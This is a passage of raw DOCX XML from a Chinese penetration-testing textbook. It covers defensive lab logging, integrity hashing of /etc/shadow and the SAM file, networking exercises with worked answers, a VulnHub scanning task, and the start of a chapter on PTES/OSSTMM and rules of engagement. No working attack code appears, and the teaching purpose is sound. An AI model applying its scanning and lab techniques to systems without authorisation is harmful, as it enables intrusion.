          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在靶机上（如果可操作）启用系统日志审计（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auditd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务访问日志，确保攻击操作被记录。蓝队利用实验环境的主要目的之一，就是通过分析这些日志学习如何检测攻击行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">快照哈希</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对关键系统文件（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">c:\windows\system32\config\SAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）在基线快照后计算哈希并存储。攻击完成后，回滚至快照并重新计算哈希可检验攻击是否修改了这些文件（即使攻击者进行了清理，虚拟机层面的磁盘对比也可能发现改动）。这模拟了真实环境中文件完整性监控（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">AIDE、Tripwire）的作用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将实验环境视作「微型企业网络」，即便只有一台靶机，也可以践行完整的防御闭环。此防御思维贯穿全书，故在此处先予强调。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="55"/>
    <w:bookmarkStart w:id="58" w:name="习题-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="56" w:name="提取题回忆与理解"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提取题（回忆与理解）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">说明</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络模式在实验室隔离场景下的主要区别（至少两条）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为什么在执行破坏性操作之前必须先保存虚拟机快照？从实验可重复性和防御实验的角度分别阐述。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示与解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式创建的虚拟网络仅允许同一物理机上的虚拟机之间通信，默认不与宿主机外部网络相连，从而形成封闭沙箱；NAT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式允许虚拟机通过宿主机的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问外部网络（如互联网），但外部网络无法主动访问虚拟机，且不同</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络间的虚拟机不能互通。在实验室中，Host-Only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是隔离的基石，NAT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">仅在需要更新工具时临时启用。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">快照可记录实验环境的完整状态，破坏性操作执行后可通过回滚恢复原始环境，避免重新安装和配置；从防御实验角度看，快照提供了攻击前后的干净参照，便于进行文件完整性对比、日志分析等取证演练。没有快照，一次失误就可能导致实验中断。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="56"/>
    <w:bookmarkStart w:id="57" w:name="靶机迁移任务"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机迁移任务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在现有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络中新增一台</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VulnHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">挑战镜像（可从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnhub.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">选择评级简单、体积较小的镜像，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Mr-Robot:1”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Kioptrix: Level 1”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。要求：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">正确导入镜像，使其与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">处于同一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描发现其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址，验证</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP（或其他主要服务）可达性；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">保存基线快照；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在实验报告中记录该靶机的开放端口、服务版本信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：部分</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VulnHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">镜像默认使用桥接网络或静态</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP，需按镜像说明修改网络配置或采用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节所述的临时桥接技巧启动后更改。遇到无法获取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的情况，可尝试在启动时进入恢复模式手动配置网络。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="57"/>
    <w:bookmarkEnd w:id="58"/>
    <w:bookmarkStart w:id="59" w:name="小结-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节完成了攻击机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与四类代表性脆弱的靶机的部署，并通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络将它们集成到一个封闭实验环境中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络可达性验证（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）是确认实验室可用的最基本步骤。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虚拟机快照是维护实验可重复性、快速恢复环境以及支撑防御取证的基石，须在每次危险操作前严格执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实验室搭建过程本身即包含防御思维：资产清单、日志开启、基线哈希存储，为后续攻防演练做好数据准备。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="59"/>
    <w:bookmarkStart w:id="60" w:name="延伸阅读-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">官方文档</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（kali.org/docs）：涵盖安装、更新、自定义及网络配置等详尽指南。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Unleashed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（OffSec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">免费课程）：以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为核心的系统化渗透教学，大量实验室场景。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VulnHub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（vulnhub.com）：提供数百个用于下载的挑战虚拟机，按难度分类，并附带</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Walkthrough </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参考。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Georgia Weidman《Penetration Testing: A Hands-On Introduction to Hacking》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：从实验环境搭建到专业渗透测试流程的经典入门教材。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">馆藏《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 24–27 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：IP、NAT、ICMP、ARP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等网络基础，支撑本节网络配置与排错的理解。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Testing Guide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：后续</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机测试的方法论依据，建议提前下载浏览。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="60"/>
    <w:bookmarkEnd w:id="61"/>
    <w:bookmarkStart w:id="69" w:name="渗透测试方法论与法律框架"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">渗透测试方法论与法律框架</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="62" w:name="ptesosstmm-阶段与渗透测试生命周期"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 PTES/OSSTMM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阶段与渗透测试生命周期</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">渗透测试绝非散乱无章的漏洞扫描合集，而是一套受严格规范约束的系统工程。倘若将攻防对抗比作军事行动，渗透测试方法论便是作战条令——它不仅定义了“做什么”，更规定了“何时做”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“做到什么程度”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“何时必须收手”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。本章从全球公认的两套标准框架切入：PTES（Penetration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Testing Execution </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Standard，渗透测试执行标准）给出操作上的阶段划分与完整生命周期；OSSTMM（Open</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Source Security Testing Methodology </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual，开源安全测试方法手册）则以度量为核心，用可验证的量化指标取代主观臆断。两者共同构成渗透测试从“艺术”走向“科学”的方法论骨架。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">首先必须明确一个根本原则：方法论是脚手架，绝非教条。PTES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OSSTMM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提供的是一套完整的思考框架与流程参考，但在真实的授权测试项目中，每一步都必须严格遵循</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RoE（Rules</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Engagement，交战规则）文档进行裁剪——RoE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">划定的范围、时间窗、禁止动作是不可逾越的法律边界，任何方法论要求与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">冲突时，RoE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">绝对优先。实践一再证明，僵化地执行标准流程而不顾</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">约束，是导致测试越界、授权失效乃至法律后果的常见根源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在展开论述之前，我们需要先将渗透测试放在全书攻防对抗的坐标系中。本书第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章引入了网络杀伤链（Cyber</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kill </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Chain）与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
